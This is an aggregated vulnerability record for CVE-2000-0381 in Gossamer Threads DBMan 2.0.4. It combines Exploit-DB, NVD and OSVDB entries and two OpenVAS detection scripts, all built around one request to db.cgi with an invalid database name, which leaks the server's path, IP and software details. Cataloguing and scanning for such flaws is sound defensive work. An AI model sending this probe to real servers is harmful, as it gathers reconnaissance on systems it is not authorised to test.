Gossamer Threads DBMan 2.0.4 DBMan Information Leakage Vulnerability
2000-05-05T00:00:00
ID EDB-ID:19903 Type exploitdb Reporter Black Watch Labs Modified 2000-05-05T00:00:00
Description
Gossamer Threads DBMan 2.0.4 DBMan Information Leakage Vulnerability. CVE-2000-0381. Remote exploits for multiple platform
source: http://www.securityfocus.com/bid/1178/info
Requesting an invalid database file from a web server implementing Gossamer Threads DBMan scripts will return a CGI error message containing environmental variables to a remote user without any authorization. The parameters displayed include the local document root path, server administrator account name, web server software, platform, etc.
http://target/scripts/dbman/db.cgi?db=invalid-db
{"id": "EDB-ID:19903", "hash": "f619ab7ba3d580f34d65a608e027fbec", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Gossamer Threads DBMan 2.0.4 DBMan Information Leakage Vulnerability", "description": "Gossamer Threads DBMan 2.0.4 DBMan Information Leakage Vulnerability. CVE-2000-0381. Remote exploits for multiple platform", "published": "2000-05-05T00:00:00", "modified": "2000-05-05T00:00:00", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/19903/", "reporter": "Black Watch Labs", "references": [], "cvelist": ["CVE-2000-0381"], "lastseen": "2016-02-02T13:00:58", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 2.1, "vector": "NONE"}, "vulnersScore": 2.1}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/19903/", "sourceData": "source: http://www.securityfocus.com/bid/1178/info\r\n\r\nRequesting an invalid database file from a web server implementing Gossamer Threads DBMan scripts will return a CGI error message containing environmental variables to a remote user without any authorization. The parameters displayed include the local document root path, server administrator account name, web server software, platform, etc.\r\n\r\nhttp://target/scripts/dbman/db.cgi?db=invalid-db", "osvdbidlist": ["306"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2016-09-03T02:38:05", "references": ["http://www.perfectotech.com/blackwatchlabs/vul5_05.html", "http://www.securityfocus.com/bid/1178", "http://archives.neohapsis.com/archives/bugtraq/2000-05/0067.html"], "description": "The Gossamer Threads DBMan db.cgi CGI script allows remote attackers to view environmental variables and setup information by referencing a non-existing database in the db parameter.", "edition": 1, "reporter": "NVD", "published": "2000-05-05T00:00:00", "title": "CVE-2000-0381", "type": "cve", "enchantments": {"score": {"modified": "2016-09-03T02:38:05", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2000-0381"], "scanner": [], "cpe": ["cpe:/a:gossamer_threads:dbman:2.0.4"], "modified": "2008-09-10T15:04:18", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0381", "id": "CVE-2000-0381", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}], "openvas": [{"lastseen": "2017-12-08T11:44:08", "references": [], "pluginID": "10403", "description": "It is possible to cause the DBMan \nCGI to reveal sensitive information, by requesting a URL such as:\n\nGET /scripts/dbman/db.cgi?db=no-db", "edition": 2, "reporter": "This script is Copyright (C) 2000 SecuriTeam", "published": "2005-11-03T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "DBMan CGI server information leakage", "type": "openvas", "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2000-0381"], "modified": "2017-12-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=10403", "id": "OPENVAS:10403", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: dbman_cgi.nasl 8023 2017-12-07 08:36:26Z teissa $\n# Description: DBMan CGI server information leakage\n#\n# Authors:\n# Noam Rathaus <noamr@securiteam.com>\n# Changes by rd : \n# - script_id\n# - script_bugtraq_id(1178);\n#\n# Copyright:\n# Copyright (C) 2000 SecuriTeam\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"It is possible to cause the DBMan \nCGI to reveal sensitive information, by requesting a URL such as:\n\nGET /scripts/dbman/db.cgi?db=no-db\";\n\ntag_solution = \"Upgrade to the latest version\";\n\nif(description)\n{\n script_id(10403);\n script_version(\"$Revision: 8023 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-07 09:36:26 +0100 (Thu, 07 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(1178);\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_cve_id(\"CVE-2000-0381\");\n name = \"DBMan CGI server information leakage\";\n script_name(name);\n \n\n \n \n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n \n script_copyright(\"This script is Copyright (C) 2000 SecuriTeam\");\n\n family = \"Web application abuses\";\n script_family(family);\n script_dependencies(\"find_service.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"http_func.inc\");\n\nport = get_http_port(default:80);\n\n\nif(get_port_state(port))\n{\n if ( get_kb_item(\"Services/www/\" + port + \"/embedded\" ) ) exit(0);\n req = http_get(item:\"/scripts/dbman/db.cgi?db=no-db\",\n \t\tport:port);\n soc = http_open_socket(port);\n if(soc)\n {\n send(socket:soc, data:req);\n result = http_recv(socket:soc);\n http_close_socket(soc);\n backup = result;\n report = string(\"\\nIt is possible to cause the DBMan\\n\", \n\"CGI to reveal sensitive information, by requesting a URL such as:\\n\\n\",\n\"GET /scripts/dbman/db.cgi?db=no-db\\n\\n\",\n\"We could obtain the following : \\n\\n\");\n if(\"CGI ERROR\" >< result)\n {\n result = strstr(backup, string(\"name: no-db at \"));\n result = result - strstr(result, string(\" line \"));\n result = result - \"name: no-db at \";\n report = \"CGI full path is at: \" + result + string(\"\\n\");\n\n result = strstr(backup, string(\"Perl Version : \"));\n result = result - strstr(result, string(\"\\n\"));\n result = result - string(\"Perl Version : \");\n report = report + \"Perl version: \" + result + string(\"\\n\");\n\n result = strstr(backup, string(\"PATH : \"));\n result = result - strstr(result, string(\"\\n\"));\n result = result - string(\"PATH : \");\n report = report + \"Server path: \" + result + string(\"\\n\");\n\n result = strstr(backup, string(\"SERVER_ADDR : \"));\n result = result - strstr(result, string(\"\\n\"));\n result = result - string(\"SERVER_ADDR : \");\n report = report + \"Server real IP: \" + result + string(\"\\n\");\n\n result = strstr(backup, string(\"SERVER_SOFTWARE : \"));\n result = result - strstr(result, string(\"\\n\"));\n result = result - string(\"SERVER_SOFTWARE : \");\n report = report + \"Server software: \" + result + string(\"\\n\");\n report = report + string(\"\\nSolution : Upgrade to the latest version\\n\");\n security_message(port, data: report);\n } \n }\n}\n\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-09-01T23:35:50", "references": [], "pluginID": "136141256231010403", "description": "It is possible to cause the DBMan\n CGI to reveal sensitive information, by requesting a URL such as:\n\n GET /scripts/dbman/db.cgi?db=no-db", "edition": 4, "reporter": "This script is Copyright (C) 2000 SecuriTeam", "published": "2005-11-03T00:00:00", "title": "DBMan CGI server information leakage", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2000-0381"], "modified": "2018-06-07T00:00:00", "id": "OPENVAS:136141256231010403", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231010403", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: dbman_cgi.nasl 10122 2018-06-07 13:09:58Z cfischer $\n#\n# DBMan CGI server information leakage\n#\n# Authors:\n# Noam Rathaus <noamr@securiteam.com>\n# Changes by rd\n#\n# Copyright:\n# Copyright (C) 2000 SecuriTeam\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.10403\");\n script_version(\"$Revision: 10122 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-06-07 15:09:58 +0200 (Thu, 07 Jun 2018) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(1178);\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_cve_id(\"CVE-2000-0381\");\n script_name(\"DBMan CGI server information leakage\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"This script is Copyright (C) 2000 SecuriTeam\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"http_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_tag(name:\"solution\", value:\"Upgrade to the latest version\");\n\n script_tag(name:\"summary\", value:\"It is possible to cause the DBMan\n CGI to reveal sensitive information, by requesting a URL such as:\n\n GET /scripts/dbman/db.cgi?db=no-db\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\n\nport = get_http_port( default:80 );\n\nreq = http_get( item:\"/scripts/dbman/db.cgi?db=no-db\", port:port );\nresult = http_send_recv( port:port, data:req );\nbackup = result;\nreport = string( \"\\nIt is possible to cause the DBMan\\nCGI to reveal sensitive information, by requesting a URL such as:\\n\\n\",\n\"GET /scripts/dbman/db.cgi?db=no-db\\n\\nWe could obtain the following : \\n\\n\");\n\nif( \"CGI ERROR\" >< result ) {\n result = strstr(backup, string(\"name: no-db at \"));\n result = result - strstr(result, string(\" line \"));\n result = result - \"name: no-db at \";\n report = \"CGI full path is at: \" + result + string(\"\\n\");\n\n result = strstr(backup, string(\"Perl Version : \"));\n result = result - strstr(result, string(\"\\n\"));\n result = result - string(\"Perl Version : \");\n report = report + \"Perl version: \" + result + string(\"\\n\");\n\n result = strstr(backup, string(\"PATH : \"));\n result = result - strstr(result, string(\"\\n\"));\n result = result - string(\"PATH : \");\n report = report + \"Server path: \" + result + string(\"\\n\");\n\n result = strstr(backup, string(\"SERVER_ADDR : \"));\n result = result - strstr(result, string(\"\\n\"));\n result = result - string(\"SERVER_ADDR : \");\n report = report + \"Server real IP: \" + result + string(\"\\n\");\n\n result = strstr(backup, string(\"SERVER_SOFTWARE : \"));\n result = result - strstr(result, string(\"\\n\"));\n result = result - string(\"SERVER_SOFTWARE : \");\n report = report + \"Server software: \" + result + string(\"\\n\");\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}], "osvdb": [{"lastseen": "2017-04-28T13:19:55", "references": [], "edition": 1, "description": "## Manual Testing Notes\nhttp://[victim]/scripts/dbman/db.cgi?db=no-db\n## References:\nSnort Signature ID: 1554\nISS X-Force ID: 4494\n[CVE-2000-0381](https://vulners.com/cve/CVE-2000-0381)\nBugtraq ID: 1178\n", "reporter": "OSVDB", "published": "2000-05-05T00:00:00", "type": "osvdb", "title": "Gossamer Threads DBMan db.cgi Malformed Database Request Information Disclosure", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2000-0381"], "modified": "2000-05-05T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:306", "id": "OSVDB:306", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}]}
